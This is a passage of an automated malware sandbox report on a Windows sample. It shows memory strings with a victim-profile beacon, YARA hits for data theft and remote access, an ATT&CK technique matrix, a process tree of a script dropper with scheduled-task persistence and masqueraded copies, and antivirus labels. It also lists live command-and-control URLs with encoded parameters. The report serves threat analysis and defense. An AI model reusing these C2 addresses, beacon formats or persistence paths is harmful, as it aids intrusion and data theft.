            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sle
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}Pp
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}Pp
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6ED5B cpuid 0_2_00D6ED5B
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00D6A63C
            Source: C:\bridgeportserver\blockServerruntime.exeQueries volume information: C:\bridgeportserver\blockServerruntime.exe VolumeInformationJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeQueries volume information: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe VolumeInformationJump to behavior
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeQueries volume information: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe VolumeInformationJump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeQueries volume information: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe VolumeInformation
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00D6D5D4
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5ACF5 GetVersionExW,0_2_00D5ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7992, type: MEMORYSTR
            Source: Yara matchFile source: 0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.1828726317.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1737024457.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: blockServerruntime.exe PID: 7436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7604, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7628, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7992, type: MEMORYSTR
            Source: Yara matchFile source: 0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.1828726317.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1737024457.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: blockServerruntime.exe PID: 7436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7604, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7628, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            1
            Scheduled Task/Job
            12
            Process Injection
            23
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            11
            Scripting
            1
            Scheduled Task/Job
            1
            Disable or Modify Tools
            LSASS Memory221
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            131
            Virtualization/Sandbox Evasion
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Native API
            Login HookLogin Hook12
            Process Injection
            NTDS131
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture112
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
            Software Packing
            DCSync137
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447088 Sample: N0tepkRPzw.exe Startdate: 24/05/2024 Architecture: WINDOWS Score: 100 50 a0985701.xsph.ru 2->50 56 Snort IDS alert for network traffic 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 14 other signatures 2->62 10 N0tepkRPzw.exe 3 6 2->10         started        13 qVUjshNEHYUOCXyHyUMQwFlZoe.exe 2 2->13         started        15 qVUjshNEHYUOCXyHyUMQwFlZoe.exe 3 2->15         started        signatures3 process4 file5 46 C:\bridgeportserver\blockServerruntime.exe, PE32 10->46 dropped 48 C:\bridgeportserver\u0vIoi.vbe, data 10->48 dropped 17 wscript.exe 1 10->17         started        process6 signatures7 54 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->54 20 cmd.exe 1 17->20         started        process8 process9 22 blockServerruntime.exe 1 18 20->22         started        26 conhost.exe 20->26         started        file10 38 C:\Windows\addins\RuntimeBroker.exe, PE32 22->38 dropped 40 C:\Windows\...\qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PE32 22->40 dropped 42 C:\Users\...\qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PE32 22->42 dropped 44 4 other malicious files 22->44 dropped 64 Antivirus detection for dropped file 22->64 66 Multi AV Scanner detection for dropped file 22->66 68 Machine Learning detection for dropped file 22->68 70 2 other signatures 22->70 28 qVUjshNEHYUOCXyHyUMQwFlZoe.exe 22->28         started        32 schtasks.exe 22->32         started        34 schtasks.exe 22->34         started        36 19 other processes 22->36 signatures11 process12 dnsIp13 52 a0985701.xsph.ru 141.8.192.26, 49730, 49731, 49732 SPRINTHOSTRU Russian Federation 28->52 72 Multi AV Scanner detection for dropped file 28->72 74 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 28->74 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            N0tepkRPzw.exe68%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            N0tepkRPzw.exe59%VirustotalBrowse
            N0tepkRPzw.exe100%AviraVBS/Runner.VPG
            N0tepkRPzw.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\bridgeportserver\u0vIoi.vbe100%AviraVBS/Runner.VPG
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%AviraHEUR/AGEN.1323984
            C:\bridgeportserver\blockServerruntime.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%AviraHEUR/AGEN.1323984
            C:\Windows\addins\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%Joe Sandbox ML
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%Joe Sandbox ML
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%Joe Sandbox ML
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%Joe Sandbox ML
            C:\bridgeportserver\blockServerruntime.exe100%Joe Sandbox ML
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%Joe Sandbox ML
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe100%Joe Sandbox ML
            C:\Windows\addins\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe68%VirustotalBrowse
            C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe68%VirustotalBrowse
            C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe68%VirustotalBrowse
            C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe68%VirustotalBrowse
            C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe68%VirustotalBrowse
            C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe68%VirustotalBrowse
            C:\Windows\addins\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\addins\RuntimeBroker.exe68%VirustotalBrowse
            C:\bridgeportserver\blockServerruntime.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\bridgeportserver\blockServerruntime.exe68%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            a0985701.xsph.ru11%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://a0985701.xsph.ru/100%Avira URL Cloudmalware
            http://a0985701.xsph.ru/11%VirustotalBrowse
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6100%Avira URL Cloudmalware
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W100%Avira URL Cloudmalware
            http://a0985701.xsph.ru100%Avira URL Cloudmalware
            http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W100%Avira URL Cloudmalware
            http://a0985701.xsph.ru11%VirustotalBrowse
            http://a0985701.xsph.ru/@=AzYyIGNycDO100%Avira URL Cloudmalware
